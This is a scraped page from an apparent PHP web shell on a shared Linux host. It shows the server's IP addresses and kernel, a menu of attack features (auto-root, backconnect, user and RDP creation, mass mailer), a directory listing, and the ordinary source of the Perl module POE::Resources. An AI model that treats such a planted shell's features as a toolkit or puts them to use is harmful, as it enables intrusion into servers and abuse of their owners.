Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
POE /
[ HOME SHELL ]
Name
Size
Permission
Action
Component
[ DIR ]
drwxr-xr-x
Driver
[ DIR ]
drwxr-xr-x
Filter
[ DIR ]
drwxr-xr-x
Loop
[ DIR ]
drwxr-xr-x
Pipe
[ DIR ]
drwxr-xr-x
Queue
[ DIR ]
drwxr-xr-x
Resource
[ DIR ]
drwxr-xr-x
Test
[ DIR ]
drwxr-xr-x
Wheel
[ DIR ]
drwxr-xr-x
Component.pm
3.42
KB
-rw-r--r--
Driver.pm
4.84
KB
-rw-r--r--
Filter.pm
10.63
KB
-rw-r--r--
Kernel.pm
170.66
KB
-rw-r--r--
Loop.pm
17.95
KB
-rw-r--r--
NFA.pm
32.17
KB
-rw-r--r--
Pipe.pm
1.71
KB
-rw-r--r--
Queue.pm
8.9
KB
-rw-r--r--
Resource.pm
2.2
KB
-rw-r--r--
Resources.pm
2.05
KB
-rw-r--r--
Session.pm
54.72
KB
-rw-r--r--
Wheel.pm
10.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Resources.pm
package POE::Resources; use strict; use vars qw($VERSION); $VERSION = '1.368'; # NOTE - Should be #.### (three decimal places) my @resources = qw( POE::XS::Resource::Aliases POE::XS::Resource::Events POE::XS::Resource::Extrefs POE::XS::Resource::FileHandles POE::XS::Resource::SIDs POE::XS::Resource::Sessions POE::XS::Resource::Signals ); sub load { my $package = (caller())[0]; foreach my $resource (@resources) { eval "package $package; use $resource"; if ($@) { # Retry the resource, removing XS:: if it couldn't be loaded. # If there's no XS:: to be removed, fall through and die. redo if $@ =~ /Can't locate.*?in \@INC/ and $resource =~ s/::XS::/::/; die; } } } 1; __END__ =head1 NAME POE::Resources - loader of POE resources =head1 SYNOPSIS # Intended for internal use by POE::Kernel. use POE::Resources; POE::Resources->load(); =head1 DESCRIPTION POE::Kernel is internally split into different resources that are separately managed by individual mix-in classes. POE::Resources is designed as a high-level macro manager for POE::Resource classes. Currently it implements a single method, load(), which loads all the POE::Resource classes. =head1 METHODS POE::Resources has a public interface, but it is intended to be used internally by POE::Kernel. Application programmers should never need to use POE::Resources directly. =head2 load POE::Kernel calls load() to loads all the known POE::Resource modules. Each resource may be handled by a pure perl module, or by an XS module. For each resource class, load() first tries to load the C<POE::XS::Resource::...> version of the module. If that fails, load() falls back to C<POE::Resource::...>. =head1 SEE ALSO See L<POE::Kernel/Resources> for public information about POE resources. See L<POE::Resource> for general discussion about resources and the classes that manage them. =head1 AUTHORS & LICENSING Please see L<POE> for more information about its authors, contributors, and POE's licensing. =cut # rocco // vim: ts=2 sw=2 expandtab # TODO - Edit.
Close